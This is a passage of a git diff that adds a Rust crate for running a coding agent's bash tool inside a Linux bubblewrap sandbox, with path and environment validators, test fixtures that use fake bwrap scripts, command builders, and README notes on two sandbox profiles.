metadata.is_dir() { + Ok(()) + } else { + Err(LinuxBwrapError::InvalidPath(format!( + "{label} is not a directory: {}", + path.display() + ))) + } +} + +/// Validates that `path` is an absolute existing path. +pub(crate) fn validate_existing_path(path: &Path, label: &str) -> Result<(), LinuxBwrapError> { + validate_absolute_path(path, label)?; + fs::metadata(path).map_err(|_| { + LinuxBwrapError::InvalidPath(format!("{label} does not exist: {}", path.display())) + })?; + Ok(()) +} + +/// Validates mount source paths. +pub(crate) fn validate_mount_paths( + mounts: &[Box], + label: &str, +) -> Result<(), LinuxBwrapError> { + for mount in mounts { + validate_existing_path(mount, label)?; + } + Ok(()) +} + +/// Validates tmpfs overlay destinations. +pub(crate) fn validate_tmpfs_overlays(overlays: &[Box]) -> Result<(), LinuxBwrapError> { + for overlay in overlays { + validate_absolute_path(overlay, "tmpfs overlay path")?; + } + Ok(()) +} + +/// Validates file overlay entries. +/// +/// The source must be an absolute path that exists on the host. The destination +/// must be an absolute path. +pub(crate) fn validate_file_overlays(overlays: &[FileOverlay]) -> Result<(), LinuxBwrapError> { + for overlay in overlays { + validate_existing_path(overlay.source(), "file overlay source")?; + validate_absolute_path(overlay.dest(), "file overlay destination")?; + } + Ok(()) +} + +/// Checks that every symlink has a non-empty target and an absolute link path. +/// +/// # Errors +/// +/// Returns [`LinuxBwrapError::InvalidPath`] for empty targets or non-absolute +/// link paths. +pub(crate) fn validate_symlinks(symlinks: &[Symlink]) -> Result<(), LinuxBwrapError> { + for symlink in symlinks { + if symlink.target().is_empty() { + return Err(LinuxBwrapError::InvalidPath(format!( + "compat symlink target must not be empty: {}", + symlink.link_path().display() + ))); + } + validate_absolute_path(symlink.link_path(), "compat symlink path")?; + } + Ok(()) +} + +/// Checks that variable names are non-empty, contain no `=`, and neither +/// names nor values contain NUL bytes. +/// +/// NUL bytes are rejected because environment variables are stored as C strings +/// in the kernel's `environ` array - a NUL would silently truncate the string +/// at that point. +/// +/// # Errors +/// +/// Returns [`LinuxBwrapError::InvalidPath`] for the first invalid variable found. +pub(crate) fn validate_env_vars(vars: &[EnvVar], label: &str) -> Result<(), LinuxBwrapError> { + for var in vars { + if var.name().is_empty() { + return Err(LinuxBwrapError::InvalidPath(format!( + "{label} environment variable name must not be empty" + ))); + } + if var.name().contains('=') { + return Err(LinuxBwrapError::InvalidPath(format!( + "{label} environment variable name must not contain '=': {}", + var.name() + ))); + } + if var.name().contains('\0') { + return Err(LinuxBwrapError::InvalidPath(format!( + "{label} environment variable name must not contain NUL: {}", + var.name() + ))); + } + if var.value().contains('\0') { + return Err(LinuxBwrapError::InvalidPath(format!( + "{label} environment variable value must not contain NUL: {}", + var.name() + ))); + } + } + Ok(()) +} + +/// Validates that bind-backed `/tmp` targets an existing directory other than +/// the host `/tmp` itself. [`TmpBacking::Tmpfs`] always passes. +/// +/// # Errors +/// +/// Returns [`LinuxBwrapError::InvalidPath`] if the host directory does not +/// exist, is not a directory, or is exactly `/tmp`. +pub(crate) fn validate_tmp_backing(tmp_backing: &TmpBacking) -> Result<(), LinuxBwrapError> { + match tmp_backing { + TmpBacking::Tmpfs => Ok(()), + TmpBacking::BindHost(host_dir) => { + validate_directory_path(host_dir, "sandbox tmp host directory")?; + if host_dir.as_ref() == Path::new("/tmp") { + return Err(LinuxBwrapError::InvalidPath( + "sandbox tmp host directory must not be /tmp; \ + use a dedicated directory to avoid sharing state \ + with the host and other sandboxes" + .to_string(), + )); + } + Ok(()) + } + } +} diff --git a/src/llm-coding-tools-bubblewrap/src/test_helpers.rs b/src/llm-coding-tools-bubblewrap/src/test_helpers.rs new file mode 100644 index 00000000..6fbcc78c --- /dev/null +++ b/src/llm-coding-tools-bubblewrap/src/test_helpers.rs @@ -0,0 +1,320 @@ +//! Shared test helpers for bubblewrap unit tests. +//! +//! Provides environment isolation ([`PathGuard`], `replace_path`, `prepend_path`), +//! fake binary scaffolding (`create_fake_bwrap`, `create_fake_shell`), and +//! reusable sandbox fixtures ([`SandboxDirs`], [`SandboxFixture`]) that set up +//! temp directory layouts and managed `PATH` overrides. + +use crate::probe::PROBE_ARG0; +use crate::{LinuxBwrapError, Profile, TmpBacking}; +use std::env; +use std::ffi::OsString; +use std::fs; +use std::path::{Path, PathBuf}; +use tempfile::TempDir; + +const DEFAULT_FAKE_SHELL: &str = "#!/bin/sh\nexit 0\n"; + +/// Captures the original `PATH` and restores it on drop. +/// +/// Used alongside [`replace_path`] or [`prepend_path`] so that test +/// environment changes are automatically cleaned up. +pub(crate) struct PathGuard(Option); + +impl PathGuard { + /// Snapshots the current `PATH` value (or notes that it is unset). + pub(crate) fn capture() -> Self { + Self(env::var_os("PATH")) + } +} + +impl Drop for PathGuard { + /// Restores the `PATH` that was active when this guard was created. + /// + /// Uses `unsafe` `env::set_var` / `env::remove_var` because Rust's safe + /// API does not permit modifying environment variables during program + /// execution. This is safe in test-only code where single-threaded + /// environment access is guaranteed. + fn drop(&mut self) { + match &self.0 { + Some(path) => unsafe { env::set_var("PATH", path) }, + None => unsafe { env::remove_var("PATH") }, + } + } +} + +/// Replaces `PATH` with `path` and returns a [`PathGuard`] that restores it. +/// +/// # Safety +/// The returned guard restores `PATH` via `unsafe` env-var APIs on drop. +/// Callers must ensure no other thread reads `PATH` concurrently. +pub(crate) fn replace_path(path: &Path) -> PathGuard { + let guard = PathGuard::capture(); + unsafe { env::set_var("PATH", path) }; + guard +} + +/// Prepends `path` to `PATH` and returns a [`PathGuard`] that restores it. +/// +/// If the current `PATH` is empty or unset, the result is just `path`. +/// +/// # Safety +/// The returned guard restores `PATH` via `unsafe` env-var APIs on drop. +/// Callers must ensure no other thread reads `PATH` concurrently. +pub(crate) fn prepend_path(path: &Path) -> PathGuard { + let guard = PathGuard::capture(); + let prefix = path.to_string_lossy(); + let original = guard.0.as_ref().map(|value| value.to_string_lossy()); + let capacity = prefix.len() + original.as_ref().map_or(0, |value| value.len() + 1); + let mut new_path = String::with_capacity(capacity); + new_path.push_str(&prefix); + if let Some(original) = original { + if !original.is_empty() { + new_path.push(':'); + new_path.push_str(&original); + } + } + unsafe { env::set_var("PATH", &new_path) }; + guard +} + +/// Writes `contents` to `path` and marks it executable on Unix. +/// +/// # Panics +/// Propagates any I/O error from the write or permission change. +pub(crate) fn write_executable(path: &Path, contents: impl AsRef<[u8]>) { + fs::write(path, contents).unwrap(); + #[cfg(unix)] + { + use std::os::unix::fs::PermissionsExt; + + let mut perms = fs::metadata(path).unwrap().permissions(); + perms.set_mode(0o755); + fs::set_permissions(path, perms).unwrap(); + } +} + +/// Writes an executable script inside `dir` and returns its path. +/// +/// # Panics +/// Propagates any I/O error. +pub(crate) fn write_script(dir: &Path, name: &str, body: &str) -> PathBuf { + let path = dir.join(name); + write_executable(&path, body.as_bytes()); + path +} + +/// Creates a fake `bash` binary that exits successfully. +/// +/// The script is a minimal `/bin/sh` wrapper that returns exit code 0. +pub(crate) fn create_fake_shell(dir: &Path) -> PathBuf { + write_script(dir, "bash", DEFAULT_FAKE_SHELL) +} + +/// Creates a fake `bwrap` script in `dir`. +/// +/// Returns the log file path. The fake binary handles `--version` and the +/// probe command itself, logs other arguments to `bwrap.log`, and then runs +/// `behavior`. +pub(crate) fn create_fake_bwrap(dir: &Path, behavior: &str) -> PathBuf { + let bwrap_path = dir.join("bwrap"); + let log_path = dir.join("bwrap.log"); + let log_path_escaped = log_path.to_string_lossy().replace('\'', "'\\''"); + let script = format!( + r#"#!/bin/sh +# Handle --version probe +for arg in "$@"; do + if [ "$arg" = "--version" ]; then + echo "bubblewrap 0.8.0" + exit 0 + fi +done +# Handle capability probe via the unique shell command marker. +for arg in "$@"; do + case "$arg" in + {probe_arg0}) + exit 0 + ;; + esac +done +# Log arguments for verification +for a in "$@"; do + printf '%s\n' "$a" >> '{log_path_escaped}' +done +echo "" >> '{log_path_escaped}' +# Execute the provided behavior +{behavior} +"#, + behavior = behavior, + log_path_escaped = log_path_escaped, + probe_arg0 = PROBE_ARG0, + ); + write_executable(&bwrap_path, script.as_bytes()); + log_path +} + +/// Standard sandbox directory layout used across tests. +/// +/// Owns a [`TempDir`] containing `workspace`, `home`, and `cache` +/// subdirectories. Dropping this value removes the entire tree. +pub(crate) struct SandboxDirs { + temp: TempDir, + workspace: PathBuf, + home: PathBuf, + cache: PathBuf, +} + +impl SandboxDirs { + /// Creates a tempdir with `workspace`, `home`, and `cache` subdirectories. + /// + /// # Panics + /// Propagates any I/O error from tempdir creation or `create_dir_all`. + pub(crate) fn new() -> Self { + let temp = TempDir::new().unwrap(); + let workspace = temp.path().join("workspace"); + let home = temp.path().join("home"); + let cache = temp.path().join("cache"); + fs::create_dir(&workspace).unwrap(); + fs::create_dir(&home).unwrap(); + fs::create_dir(&cache).unwrap(); + Self { + temp, + workspace, + home, + cache, + } + } + + /// Returns the temp root path. + pub(crate) fn temp_path(&self) -> &Path { + self.temp.path() + } + + /// Returns the workspace path. + pub(crate) fn workspace(&self) -> &Path { + &self.workspace + } + + /// Returns the home path. + pub(crate) fn home(&self) -> &Path { + &self.home + } + + /// Returns the cache path. + pub(crate) fn cache(&self) -> &Path { + &self.cache + } + + /// Creates a named directory inside the temp root. + /// + /// # Panics + /// Propagates any I/O error. + pub(crate) fn make_dir(&self, name: &str) -> PathBuf { + let path = self.temp_path().join(name); + fs::create_dir_all(&path).unwrap(); + path + } +} + +/// Shared sandbox fixture with fake binaries and a managed `PATH`. +pub(crate) struct SandboxFixture { + dirs: SandboxDirs, + _path_guard: PathGuard, +} + +impl SandboxFixture { + /// Creates a fixture whose temp root fully replaces `PATH`. + pub(crate) fn new(bwrap_behavior: &str) -> Self { + Self::with_path_mode(bwrap_behavior, false) + } + + /// Creates a fixture whose temp root is prepended to `PATH`. + #[allow(dead_code)] + pub(crate) fn with_prepended_path(bwrap_behavior: &str) -> Self { + Self::with_path_mode(bwrap_behavior, true) + } + + fn with_path_mode(bwrap_behavior: &str, prepend: bool) -> Self { + let dirs = SandboxDirs::new(); + create_fake_bwrap(dirs.temp_path(), bwrap_behavior); + create_fake_shell(dirs.temp_path()); + let _path_guard = if prepend { + prepend_path(dirs.temp_path()) + } else { + replace_path(dirs.temp_path()) + }; + Self { dirs, _path_guard } + } + + /// Returns the temp root path. + pub(crate) fn temp_path(&self) -> &Path { + self.dirs.temp_path() + } + + /// Returns the workspace path. + pub(crate) fn workspace(&self) -> &Path { + self.dirs.workspace() + } + + /// Returns the home path. + pub(crate) fn home(&self) -> &Path { + self.dirs.home() + } + + /// Returns the cache path. + pub(crate) fn cache(&self) -> &Path { + self.dirs.cache() + } + + /// Creates a named directory inside the temp root. + pub(crate) fn make_dir(&self, name: &str) -> PathBuf { + self.dirs.make_dir(name) + } + + /// Overwrites the fake `bash` binary with a custom script. + #[allow(dead_code)] + pub(crate) fn write_shell(&self, body: &str) -> PathBuf { + write_script(self.temp_path(), "bash", body) + } + + /// Overwrites the fake `bwrap` binary with a custom behavior script. + #[allow(dead_code)] + pub(crate) fn write_bwrap(&self, behavior: &str) -> PathBuf { + create_fake_bwrap(self.temp_path(), behavior) + } + + /// Builds the standard public-bot test profile. + /// + /// # Returns + /// `Ok([`Profile`])` on success, or `Err([`LinuxBwrapError`])` if + /// profile construction fails. + pub(crate) fn public_bot_profile(&self) -> Result { + Profile::public_bot_defaults( + self.workspace(), + self.home(), + self.cache(), + Some(TmpBacking::Tmpfs), + ) + } + + /// Builds the standard trusted-maintenance test profile. + /// + /// # Returns + /// `Ok([`Profile`])` on success, or `Err([`LinuxBwrapError`])` if + /// profile construction fails. + pub(crate) fn trusted_maintenance_profile( + &self, + host_tmp: &Path, + ) -> Result { + Profile::trusted_maintenance_defaults(self.workspace(), self.home(), self.cache(), host_tmp) + } +} + +/// Converts command args into owned strings for assertions. +pub(crate) fn args_as_strings<'a>( + args: impl IntoIterator, +) -> Vec { + args.into_iter() + .map(|arg| arg.to_string_lossy().into_owned()) + .collect() +} diff --git a/src/llm-coding-tools-bubblewrap/src/wrap/blocking.rs b/src/llm-coding-tools-bubblewrap/src/wrap/blocking.rs new file mode 100644 index 00000000..c998bb66 --- /dev/null +++ b/src/llm-coding-tools-bubblewrap/src/wrap/blocking.rs @@ -0,0 +1,33 @@ +//! Blocking `process-wrap` integration for bubblewrap execution. +//! +//! # Public API +//! +//! - [`build_command_wrap`] — build the blocking wrapped command + +use super::wrap_command; +use crate::{LinuxBwrapError, Profile}; +use process_wrap::std::{CommandWrap, ProcessGroup}; +use std::path::Path; +use std::process::Stdio; + +/// Builds a sync [`CommandWrap`] from a [`Profile`]. +/// +/// # Errors +/// +/// Returns [`LinuxBwrapError`] on invalid per-command workdir. +pub fn build_command_wrap( + profile: &Profile, + command: &str, + workdir: Option<&Path>, +) -> Result { + let wrapped = wrap_command(profile, command, workdir)?; + + let mut wrap = CommandWrap::with_new(wrapped.program(), |cmd| { + cmd.args(wrapped.args()); + cmd.stdin(Stdio::null()) + .stdout(Stdio::piped()) + .stderr(Stdio::piped()); + }); + wrap.wrap(ProcessGroup::leader()); + Ok(wrap) +} diff --git a/src/llm-coding-tools-bubblewrap/src/wrap/command.rs b/src/llm-coding-tools-bubblewrap/src/wrap/command.rs new file mode 100644 index 00000000..17f07ac8 --- /dev/null +++ b/src/llm-coding-tools-bubblewrap/src/wrap/command.rs @@ -0,0 +1,284 @@ +//! Builds `bwrap` command lines from a validated sandbox profile. +//! +//! Given a validated [`crate::profile::Profile`], this module appends the +//! per-invocation working directory and shell command to the precomputed static +//! `bwrap` argv prefix and produces a [`LinuxBwrapWrappedCommand`] ready for +//! execution. + +use crate::profile::validation::validate_optional_directory_path; +use crate::profile::Profile; +use crate::LinuxBwrapError; +use std::borrow::Cow; +use std::ffi::{OsStr, OsString}; +use std::path::Path; + +/// A command wrapped in a `bwrap` sandbox. +/// +/// The wrapped command borrows the profile's static data and the caller's shell +/// command string. The working directory is only allocated when it must be +/// rewritten into a different sandbox path. +#[derive(Debug, Clone, PartialEq, Eq)] +pub struct LinuxBwrapWrappedCommand<'a> { + program: &'a Path, + static_args: &'a [OsString], + sandbox_cwd: Cow<'a, Path>, + shell: &'a Path, + command: &'a str, +} + +impl<'a> LinuxBwrapWrappedCommand<'a> { + /// Returns the `bwrap` executable path. + #[inline] + pub fn program(&self) -> &Path { + self.program + } + + /// Returns the number of argv entries that will be passed to `bwrap`. + #[inline] + pub fn arg_count(&self) -> usize { + self.static_args.len() + 6 + } + + /// Returns the complete argv iterator to pass to `bwrap`. + /// + /// Pass each element to `std::process::Command::args` (or equivalent). + /// The tail is always `--chdir -- -c `. + #[inline] + pub fn args(&self) -> impl Iterator + Clone + '_ { + self.static_args + .iter() + .map(OsString::as_os_str) + .chain(Some(OsStr::new("--chdir"))) + .chain(Some(self.sandbox_cwd.as_os_str())) + .chain(Some(OsStr::new("--"))) + .chain(Some(self.shell.as_os_str())) + .chain(Some(OsStr::new("-c"))) + .chain(Some(OsStr::new(self.command))) + } +} + +#[inline] +fn resolve_sandbox_cwd<'a>( + profile: &'a Profile, + workdir: Option<&'a Path>, +) -> Result, LinuxBwrapError> { + validate_workdir(workdir)?; + profile.map_workdir_to_sandbox(workdir) +} + +/// Builds a `bwrap` command line that runs `command` inside the sandbox +/// described by `profile`. +#[inline] +pub fn wrap_command<'a>( + profile: &'a Profile, + command: &'a str, + workdir: Option<&'a Path>, +) -> Result, LinuxBwrapError> { + Ok(LinuxBwrapWrappedCommand { + program: profile.bwrap_program(), + static_args: profile.static_args(), + sandbox_cwd: resolve_sandbox_cwd(profile, workdir)?, + shell: profile.shell(), + command, + }) +} + +/// Rejects non-absolute or non-existent working directories. +fn validate_workdir(workdir: Option<&Path>) -> Result<(), LinuxBwrapError> { + validate_optional_directory_path(workdir, "working directory") +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::test_helpers::{args_as_strings, write_script, SandboxFixture}; + use crate::{Availability, NetworkPolicy, Preset}; + use serial_test::serial; + use std::env; + use std::fs; + use std::path::PathBuf; + use std::sync::Arc; + + #[test] + #[serial] + fn build_command_line_orders_env_mounts_and_cwd() { + let fixture = SandboxFixture::new("exit 0"); + let ro_mount = fixture.make_dir("ro"); + let rw_mount = fixture.make_dir("rw"); + + let default_env: Arc<[crate::EnvVar]> = + Arc::new([crate::EnvVar::new("HOME", "/home/user")]); + let extra_env: Arc<[crate::EnvVar]> = Arc::new([crate::EnvVar::new("FOO", "bar")]); + let ro_mounts: Arc<[Box]> = Arc::new([ + ro_mount.clone().into_boxed_path(), + fixture.temp_path().to_path_buf().into_boxed_path(), + ]); + let rw_mounts: Arc<[Box]> = Arc::new([rw_mount.clone().into_boxed_path()]); + + let profile = crate::Builder::new( + fixture.workspace(), + fixture.home(), + fixture.cache(), + crate::TmpBacking::Tmpfs, + ) + .with_preset(Preset::PublicBot) + .with_clear_env(true) + .with_default_env(default_env) + .with_extra_env(extra_env) + .with_read_only_mounts(ro_mounts) + .with_read_write_mounts(rw_mounts) + .with_network_policy(NetworkPolicy::Disabled) + .with_availability(Availability::Available) + .build() + .unwrap(); + + let cmd_line = wrap_command(&profile, "echo hello", None).unwrap(); + let args = args_as_strings(cmd_line.args()); + + let clearenv_pos = args.iter().position(|a| a == "--clearenv").unwrap(); + let setenv_home_pos = args.iter().position(|a| a == "--setenv").unwrap(); + assert!(clearenv_pos < setenv_home_pos); + assert!(args.contains(&"--unshare-net".to_string())); + let ro_bind_pos = args.iter().position(|a| a == "--ro-bind").unwrap(); + let bind_positions: Vec<_> = args + .iter() + .enumerate() + .filter(|(_, a)| *a == "--bind") + .map(|(i, _)| i) + .collect(); + for bind_pos in &bind_positions { + assert!(ro_bind_pos < *bind_pos); + } + + let chdir_pos = args.iter().position(|a| a == "--chdir").unwrap(); + assert_eq!(args[chdir_pos + 1], fixture.workspace().to_string_lossy()); + assert!(args.contains(&"--proc".to_string())); + assert!(args.contains(&"--dev".to_string())); + assert!(args.contains(&"--tmpfs".to_string())); + } + + #[test] + #[serial] + fn build_command_line_uses_workdir_over_workspace() { + let fixture = SandboxFixture::new("exit 0"); + let workdir = fixture.workspace().join("subdir"); + fs::create_dir_all(&workdir).unwrap(); + let profile = fixture.public_bot_profile().unwrap(); + + let cmd_line = wrap_command(&profile, "echo hello", Some(&workdir)).unwrap(); + let args = args_as_strings(cmd_line.args()); + + let chdir_pos = args.iter().position(|a| a == "--chdir").unwrap(); + assert_eq!(args[chdir_pos + 1], "/workspace/subdir"); + } + + #[test] + #[serial] + fn public_bot_defaults_emit_expected_bwrap_argv() { + let fixture = SandboxFixture::new("exit 0"); + let profile = fixture.public_bot_profile().unwrap(); + + let cmd_line = wrap_command(&profile, "echo hello", None).unwrap(); + let args = args_as_strings(cmd_line.args()); + + assert!(args.contains(&"--clearenv".to_string())); + assert!(args.iter().any(|a| a == "--setenv")); + assert!(args.contains(&"PATH".to_string())); + let path_pos = args.iter().position(|a| a == "PATH").unwrap(); + assert!( + args[path_pos + 1].contains("/usr/bin") + || args[path_pos + 1].contains("/run/current-system/sw/bin") + || args[path_pos + 1].contains("/nix/var/nix/profiles/default/bin") + ); + assert!(args.contains(&"HOME".to_string())); + assert!(args.contains(&"/home/sandbox".to_string())); + assert!(args.contains(&"--unshare-net".to_string())); + assert!( + args.contains(&"/usr/bin".to_string()) + || args.contains(&"/run/current-system/sw".to_string()) + || args.contains(&"/nix/store".to_string()) + ); + assert!(args.contains(&"--dev".to_string())); + assert!(args.contains(&"--proc".to_string())); + assert!(args.contains(&"--tmpfs".to_string())); + let bind_positions: Vec<_> = args + .iter() + .enumerate() + .filter(|(_, a)| *a == "--bind") + .map(|(i, _)| i) + .collect(); + assert_eq!(bind_positions.len(), 2); + assert!(!args.contains(&fixture.cache().to_string_lossy().to_string())); + let dash_pos = args.iter().position(|a| a == "--").unwrap(); + assert!(Path::new(&args[dash_pos + 1]).is_absolute()); + assert!(args[dash_pos + 1].ends_with("/bash") || args[dash_pos + 1].ends_with("/sh")); + assert_eq!(args[dash_pos + 2], "-c"); + assert_eq!(args[dash_pos + 3], "echo hello"); + } + + #[test] + #[serial] + fn trusted_maintenance_allows_visible_absolute_workdir() { + let fixture = SandboxFixture::new("exit 0"); + let host_tmp = fixture.make_dir("host-tmp"); + let outside = ["/usr/bin", "/usr", "/bin", "/etc", "/var"] + .into_iter() + .map(Path::new) + .find(|path| path.is_dir()) + .expect("expected a visible host directory outside /home and /tmp"); + + let profile = fixture.trusted_maintenance_profile(&host_tmp).unwrap(); + + let cmd_line = wrap_command(&profile, "pwd", Some(outside)).unwrap(); + let args = args_as_strings(cmd_line.args()); + let chdir_pos = args.iter().position(|arg| arg == "--chdir").unwrap(); + assert_eq!(args[chdir_pos + 1], outside.to_string_lossy()); + } + + #[test] + #[serial] + fn explicit_mount_workdir_maps_to_same_path_mount() { + let fixture = SandboxFixture::new("exit 0"); + let ro_mount = fixture.make_dir("shared"); + let nested = ro_mount.join("subdir"); + + fs::create_dir_all(&nested).unwrap(); + + let profile = crate::Builder::new( + fixture.workspace(), + fixture.home(), + fixture.cache(), + crate::TmpBacking::Tmpfs, + ) + .with_read_only_mounts(Arc::from([ + fixture.temp_path().to_path_buf().into_boxed_path(), + ro_mount.clone().into_boxed_path(), + ])) + .build() + .unwrap(); + + let cmd_line = wrap_command(&profile, "pwd", Some(nested.as_path())).unwrap(); + let args = args_as_strings(cmd_line.args()); + let chdir_pos = args.iter().position(|arg| arg == "--chdir").unwrap(); + assert_eq!(args[chdir_pos + 1], nested.to_string_lossy()); + } + + #[test] + #[serial] + fn path_changes_after_build_do_not_change_prevalidated_shell() { + let fixture = SandboxFixture::new("exit 0"); + let fake_bin = fixture.make_dir("fake-bin"); + let profile = fixture.public_bot_profile().unwrap(); + + write_script(&fake_bin, "bash", "#!/bin/sh\nexit 0\n"); + unsafe { env::set_var("PATH", &fake_bin) }; + + let cmd_line = wrap_command(&profile, "echo hello", None).unwrap(); + let args = args_as_strings(cmd_line.args()); + let dash_pos = args.iter().position(|arg| arg == "--").unwrap(); + assert_eq!( + PathBuf::from(&args[dash_pos + 1]), + profile.shell().to_path_buf() + ); + } +} diff --git a/src/llm-coding-tools-bubblewrap/src/wrap/mod.rs b/src/llm-coding-tools-bubblewrap/src/wrap/mod.rs new file mode 100644 index 00000000..e16de045 --- /dev/null +++ b/src/llm-coding-tools-bubblewrap/src/wrap/mod.rs @@ -0,0 +1,26 @@ +//! Wraps shell commands inside `bwrap` sandboxes. +//! +//! [`wrap_command`] builds a `bwrap` command from a validated +//! [`crate::profile::Profile`]. +//! The `blocking` and `tokio` submodules adapt it for sync or async execution +//! via `process-wrap`. +//! +//! # Public API +//! +//! - [`wrap_command`] - build the wrapped command +//! - [`LinuxBwrapWrappedCommand`] - program path plus argv iterator +//! +//! # Feature Flags +//! +//! - `blocking` - enables the `blocking` submodule (sync) +//! - `tokio` - enables the `tokio` submodule (async) + +pub(crate) mod command; + +#[cfg(feature = "blocking")] +pub mod blocking; +#[cfg(feature = "tokio")] +pub mod tokio; + +pub use crate::LinuxBwrapError; +pub use command::{wrap_command, LinuxBwrapWrappedCommand}; diff --git a/src/llm-coding-tools-bubblewrap/src/wrap/tokio.rs b/src/llm-coding-tools-bubblewrap/src/wrap/tokio.rs new file mode 100644 index 00000000..5fbf709a --- /dev/null +++ b/src/llm-coding-tools-bubblewrap/src/wrap/tokio.rs @@ -0,0 +1,33 @@ +//! Tokio `process-wrap` integration for bubblewrap execution. +//! +//! # Public API +//! +//! - [`build_command_wrap`] — build the async wrapped command + +use super::wrap_command; +use crate::{LinuxBwrapError, Profile}; +use process_wrap::tokio::{CommandWrap, ProcessGroup}; +use std::path::Path; +use std::process::Stdio; + +/// Builds an async [`CommandWrap`] from a [`Profile`]. +/// +/// # Errors +/// +/// Returns [`LinuxBwrapError`] on invalid per-command workdir. +pub fn build_command_wrap( + profile: &Profile, + command: &str, + workdir: Option<&Path>, +) -> Result { + let wrapped = wrap_command(profile, command, workdir)?; + + let mut wrap = CommandWrap::with_new(wrapped.program(), |cmd| { + cmd.args(wrapped.args()); + cmd.stdin(Stdio::null()) + .stdout(Stdio::piped()) + .stderr(Stdio::piped()); + }); + wrap.wrap(ProcessGroup::leader()); + Ok(wrap) +} diff --git a/src/llm-coding-tools-core/Cargo.toml b/src/llm-coding-tools-core/Cargo.toml index 35c06566..52058990 100644 --- a/src/llm-coding-tools-core/Cargo.toml +++ b/src/llm-coding-tools-core/Cargo.toml @@ -17,6 +17,7 @@ tokio = [ "async", "dep:tokio", "dep:reqwest", + "llm-coding-tools-bubblewrap?/tokio", "process-wrap/tokio1", "process-wrap/job-object", "process-wrap/process-group", @@ -27,10 +28,13 @@ blocking = [ "maybe-async/is_sync", "dep:reqwest", "reqwest?/blocking", + "llm-coding-tools-bubblewrap?/blocking", "process-wrap/std", "process-wrap/job-object", "process-wrap/process-group", ] +# Linux sandbox API support - only exposes types on Linux targets. +linux-bubblewrap = ["dep:llm-coding-tools-bubblewrap"] [dependencies] # Tool outputs (BashOutput, GrepOutput, etc.) serialize to JSON for LLM consumption @@ -93,7 +97,11 @@ process-wrap = { version = "9.1", default-features = false } # Compile-time string formatting for prompt text and parameter descriptions const_format = "0.2.35" +# Linux sandbox types and runtime +llm-coding-tools-bubblewrap = { version = "0.1.0", path = "../llm-coding-tools-bubblewrap", optional = true, default-features = false } + [dev-dependencies] +serial_test = "3" tempfile = "3.27" # For async tests (when async feature enabled) tokio = { version = "1.50", features = ["rt", "macros"] } diff --git a/src/llm-coding-tools-core/README.md b/src/llm-coding-tools-core/README.md index 0d7901c9..17516288 100644 --- a/src/llm-coding-tools-core/README.md +++ b/src/llm-coding-tools-core/README.md @@ -15,6 +15,7 @@ Framework-agnostic core library of standard tools used by coding agents - headle - [Tools, context, and integration](#tools-context-and-integration) - [Standard tools](#standard-tools) - [Path safety and sandboxing](#path-safety-and-sandboxing) + - [Linux shell sandboxing](#linux-shell-sandboxing) - [Context and wrapper mapping](#context-and-wrapper-mapping) - [System prompt builder](#system-prompt-builder) - [Typical wrapper integration (serdesAI)](#typical-wrapper-integration-serdesai) @@ -36,6 +37,7 @@ llm-coding-tools-core = { version = "0.2", default-features = false, features = - `tokio` (default): async runtime support - `blocking`: sync/blocking mode - `async`: internal base async feature (enabled by runtimes, not directly) +- `linux-bubblewrap`: Sandboxing support for Linux, by leveraging `bwrap` tool. `tokio` and `blocking` are mutually exclusive. @@ -84,6 +86,28 @@ fn demo() -> ToolResult<()> { } ``` +#### Linux shell sandboxing + +Enable the `linux-bubblewrap` feature flag to sandbox [`bash`] ([`execute_command`]) +via Linux `bwrap`. This limits visible filesystem, environment, and network +access for executed commands. + +Two profiles are available: + +- **Public Bot** (`Profile::public_bot_defaults`) + Strictest containment for hostile input. No host filesystem access, synthetic + home, memory-backed `/tmp`, network disabled. + +- **Trusted Maintenance** (`Profile::trusted_maintenance_defaults`) + Broader profile for builds and repairs in a more trusted environment. + Read-only host `/` with writable overlays, disk-backed `/tmp`, network enabled. + +We default to the **Public Bot** profile when sandboxing is enabled. In either +case, evaluate whether the chosen profile fits your security needs. + +See [SANDBOX-PROFILES.md](https://github.com/Sewer56/llm-coding-tools/blob/main/SANDBOX-PROFILES.md) for the full operator +guide and checklist. + ### Context and wrapper mapping [`context`] provides reusable guidance constants. @@ -191,7 +215,7 @@ let agent = AgentBuilder::<(), String>::new(model) .tool(pb.track(ReadTool::::new())) .tool(pb.track(GlobTool::new())) .tool(pb.track(GrepTool::::new())) - .tool(pb.track(BashTool::new())) + .tool(pb.track(BashTool::host())) .system_prompt(pb.build()) .build(); # } diff --git a/src/llm-coding-tools-core/examples/system_prompt/mock_tools.rs b/src/llm-coding-tools-core/examples/system_prompt/mock_tools.rs index 255cb699..a9ec0f91 100644 --- a/src/llm-coding-tools-core/examples/system_prompt/mock_tools.rs +++ b/src/llm-coding-tools-core/examples/system_prompt/mock_tools.rs @@ -161,7 +161,10 @@ impl ToolContext for MockBashTool { const NAME: &'static str = tool_metadata::bash::NAME; fn context(&self) -> ToolPrompt { - ToolPrompt::Bash + ToolPrompt::Bash { + network_disabled: false, + sandboxed: false, + } } } diff --git a/src/llm-coding-tools-core/src/context/tool_prompt/mod.rs b/src/llm-coding-tools-core/src/context/tool_prompt/mod.rs index afb408ed..2ed526c7 100644 --- a/src/llm-coding-tools-core/src/context/tool_prompt/mod.rs +++ b/src/llm-coding-tools-core/src/context/tool_prompt/mod.rs @@ -35,7 +35,22 @@ pub enum ToolPrompt { /// Uses a fixed guidance string as-is. Static(&'static str), /// Writes guidance for `bash`. - Bash, + Bash { + /// Whether network access is disabled for the bash execution. + /// + /// When `true`, the rendered prompt includes a note that network access + /// is disabled inside the sandbox. This is only meaningful when + /// `sandboxed` is also `true` - a host-level bash session cannot + /// restrict networking, so the default is `false`. + network_disabled: bool, + /// Whether the bash execution is confined to a Linux sandbox (e.g. bubblewrap). + /// + /// When `true`, the rendered prompt notes that commands run inside a Linux + /// sandbox. Defaults to `false` (unrestricted host execution). Can be + /// combined with `network_disabled`; setting `network_disabled` without + /// `sandboxed` has no effect. + sandboxed: bool, + }, /// Writes guidance for `read`. Read { path_mode: PathMode, @@ -114,7 +129,7 @@ impl ToolPromptFacts { fn record(&mut self, prompt: ToolPrompt) { match prompt { ToolPrompt::Static(_) => {} - ToolPrompt::Bash => self.has_bash = true, + ToolPrompt::Bash { .. } => self.has_bash = true, ToolPrompt::Read { path_mode, line_numbers, diff --git a/src/llm-coding-tools-core/src/context/tool_prompt/tool_sections.rs b/src/llm-coding-tools-core/src/context/tool_prompt/tool_sections.rs index 300a66c7..72497c34 100644 --- a/src/llm-coding-tools-core/src/context/tool_prompt/tool_sections.rs +++ b/src/llm-coding-tools-core/src/context/tool_prompt/tool_sections.rs @@ -19,7 